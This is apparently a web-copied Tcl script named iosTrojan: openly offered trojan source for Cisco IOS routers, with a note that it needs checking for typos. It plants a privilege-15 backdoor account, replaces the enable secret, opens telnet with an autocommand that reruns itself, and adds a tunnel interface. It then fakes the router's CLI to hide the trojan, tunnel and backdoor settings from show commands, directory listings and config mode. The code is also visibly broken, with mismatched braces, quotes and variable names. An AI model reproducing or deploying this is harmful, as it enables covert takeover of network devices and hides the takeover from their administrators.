[cc lang=”tcl”]proc iosTrojan {}{
proc infection {}{
exec “terminal no monitor”
ios_config “line vty 0 4” “no login local”
ios_config “line vty 0 4” “no transport input”
ios_config “line vty 0 4” “”no autocomman”
ios_config “line vty 0 4” “transport input telnet”
ios_config “line vty 0 4” “password iamatroyan”
ios_config “line console 0” “login local”
ios_config “username jdoe priv 15 password iamahacker”
ios_config “line vty 0 4” “”username jdoe autocommand Tclsh NVRAM:iosTrojan.Tcl”
ios_config “no enable secret”
ios_config “no enable password”
ios_config “enable secret iamhacked Cisco”
ios_config “service password-encryption”
ios_config “interface tunnel 0” “ip address 192.168.10.1 255.255.255.252”
ios_config “interface tunnel 0” “tunnel source fastethernet 0/0”
ios_config “interface tunnel 0” “tunnel destination 192.168.3.1”
}
proc sh_int {}{
exec “show interfaces | redirect NVRAM:int.txt”
set itf [open “NVRAM:int.txt” r]
fconfigure $itf -buffering line
gets $itf datos
while {![eof $itf]} {
if {[string match “Tunnel0*” $datos]} {

break

} else {
puts $datos
{
gets $itf datos
{
close $it
file delete NVRAM:int.txt
}
proc dir_NVRAM {}
{
set output [exec “dir NVRAM:”]
set itf [open “NVRAM:dirNVRAM.txt” w]

puts $itf $output
close $itf
set itf [open “NVRAM:dirNVRAM.txt” r]
fconfigure $itf -buffering line
gets $itf datos
while {![eof $itf]} {
if {[string match “*iosTrojan.Tcl*” $datos]} {
}else{
puts $datos
}
gets $itf datos
}
close $itf
file delete NVRAM:dirNVRAM.txt
}

proc getInput {} {
set ret “”
while {[set ch [read stdin 1]] != “n” && $ch != “r”} {
if {$ch == “”} continue
if {$ch == “u007f”} {
set ret [string range $ret 0 end-1]
} else {
append ret $ch
{
flush stdout
{
return $ret
{
proc sh_version {} {
exec “show version | redirect NVRAM:vers.txt”
set vf [open “NVRAM:vers.txt” r]
fconfigure $vf -buffering line
gets $vf datos
while {![eof $vf]} {
if {[string match “Compiled*” $datos]} {
puts “Compiled Wed 25-Apr-2007 03:18 by Manuel Santander”
} else {
puts $datos
}
gets $vf datos
}
close $vf

file delete NVRAM:vers.txt
}

proc sh_int_brief {} {
exec “show ip interface brief | redirect NVRAM:shipint.txt”
set vf [open “NVRAM:shipint.txt” r]
fconfigure $vf -buffering line
gets $vf datos
while {![eof $vf]} {
if {[string match “Tunnel*” $datos]} {
} else {
puts $datos
}
gets $vf datos
}
close $vf
file delete NVRAM:shipint.txt
}

proc sh_ip_route {} {
exec “show ip route | redirect NVRAM:shiproute.txt”
set vf [open “NVRAM:shiproute.txt” r]
fconfigure $vf -buffering line
gets $vf datos
while {![eof $vf]} {
if {[string match “*Tunnel*” $datos]} {
} else {
if {[string match “*192.168.10.0*” $datos]} {
} else {
puts
$datos
}
}
gets $vf datos
}
close $vf
file delete NVRAM:shiproute.txt
}
proc show_conf {} {
exec “show configuration | redirect NVRAM:shconf.txt”
set vf [open “NVRAM:shconf.txt” r]
fconfigure $vf -buffering line
gets $vf datos
while {![eof $vf]} {
if {[string match “*iosTrojan*” $datos]} {
} else {
if {[string match “*Tunnel*” $datos]} {
} else {
if {[string match “*ip address 192.168.10*” $datos]} {
} else {
puts $datos
}
}
}
gets $vf datos
}
close $vf
file delete NVRAM:shconf.txt
}
proc show_run_conf {} {
exec “show running5config | redirect NVRAM:shrconf.txt”
set vf [open “NVRAM:shrconf.txt” r]
fconfigure $vf -buffering line
gets $vf datos
while {![eof $vf]} {
if {[string match “*iosTrojan*” $datos]} {
} else {
if {[string match “*Tunnel*” $datos]} {
} else {
if {[string match “*ip address 192.168.10*” $datos]} {
} else {
puts $datos
}
}
}
gets $vf datos
}
close $vf
file delete NVRAM:shrconf.txt
}
proc conf_t {} {
fconfigure stdout -buffering none
set c_prompt [info hostname]
append c_prompt “(config)#”
puts “Enter configuration commands, one per line. End with CNTL/Z.”
puts -nonewline $c_prompt
set comando [getInput]
while {[string compare $comando “exit”]} {
if {[string match “int*” $comando]} {
set i_prompt [info hostname]
append i_prompt “(config5if)#”
puts -nonewline $i_prompt
set i_comando [getInput]
while {[string compare $i_comando “exit”]} {
if {[catch {ios_config “$comando” “$i_comando”} e]} {
puts $e
}
puts -nonewline $i_prompt
set i_comando [getInput]
}
} else {
if {[string match “router *” $comando]} {
set r_prompt [info hostname]
append r_prompt “(config5router)#”
puts -nonewline $r_prompt
set r_comando [getInput]
while {[string compare $r_comando “exit”]} {
if {[catch {ios_config “$comando” “$r_comando”} e]} {
puts $e
}
puts -nonewline $r_prompt
set r_comando [getInput]
}
} else {
if {[string match “lin *” $comando]} {
set l_prompt [info hostname]
append l_prompt “(config5line)#”
puts -nonewline $l_prompt
set l_comando [getInput]
while {[string compare $l_comando “exit”]} {
if {[string match “*transport*” $l_comando]} {
}
else
{
if {[string match “*password*” $l_comando]}
{
} else
{
if {[string match “*autocommand*” $l_comando]} {
} else {
if {[catch {ios_config “$comando” “$l_comando”} e]} {
puts $e
}
}
}
}
puts -nonewline $r_prompt
set r_comando [getInput]
}
} else {
if {[catch {ios_config “$comando”} e]} {
puts $e
}
}
}
}
puts -nonewline $c_prompt
set comando [getInput]
}
}

infection

fconfigure stdout -buffering none
set resultado1 “”
set resultado2 “”
set resultado3 “”
set resultado4 “”
set resultado5 “”
set resultado6 “”
set resultado7 “”
set resultado8 “”
set resultado9 “”
set salidafinal “”
set n_prompt [info hostname]
append n_prompt “#”
puts ” ”
puts -nonewline $n_prompt
set comando [getInput]
while {[string compare $comando “exit”]} {
regexp “sh(ow|o)? int(erfaces|erface|erfac|erfa|erf|er|e)?” $comando resultado1

regexp “sh(ow|o)? ver(sion|sio|si|s)?” $comando resultado2

regexp “sh(ow|o)? conf(iguration|iguratio|igurati|igurat|igura|igur|igu|ig|i)?” $comando resultado3

regexp “sh(ow|o)? run(ning5config|ning5confi|ning5conf|ning5con|ning5co|ning5c|ning5|ning|nin|ni|n)?” $comando resultado

regexp “sh(ow|o)? ip int(erface|erfac|erfa|erf|er|e)? br(ief|ie|i)?” $comando resultado5

regexp “dir nv(ram:|ram|ra|r)?” $comando resultado6

regexp “Tcls(h)?” $comando resultado7

regexp “sh(ow|o)? ip ro(ute|ut|u)?” $comando resultado8

regexp “conf(igure|igur|igu|ig|i)? t(erminal|ermina|ermin|ermi|erm|er|e)?” $comando
resultado9

if {[string compare “” $resultado1]} {

sh_int
} else {
if {[string compare “” $resultado2]} {

sh_version
} else {
if {[string compare “” $resultado3]} {

show_conf
} else {
if {[string compare “” $resultado4]} {

show_run_conf
} else {
if {[string compare “” $resultado5]} {

sh_int_brief
} else {
if {[string compare “” $resultado6]} {

dir_NVRAM
} else {
if {[string compare “” $resultado7]} {

puts ”

puts ” Invalid input detected at ‘^’ marker.”
puts ”

}
else
{
if {[string compare “” $resultado8]} {

sh_ip_route
} else
{
if {[string compare “” $resultado9]}

{
conf_t
} else {
if {[catch {set salidafinal [exec $comando]} e]} {
puts ” ”
puts ” Invalid input detected at ‘^’ marker.”
puts ” ”
}
}
}
}
}
}
}
}
}
}
set resultado1 “”
set resultado2 “”
set resultado3 “”
set resultado4 “”
set resultado5 “”
set resultado6 “”
set resultado7 “”
set resultado8 “”
set resultado9 “”
set salidafinal “”
puts -nonewline $n_prompt
set comando [getInput]
}
exec “exit”
}
iosTrojan[/cc]

/* needs to be checked for typos */
Source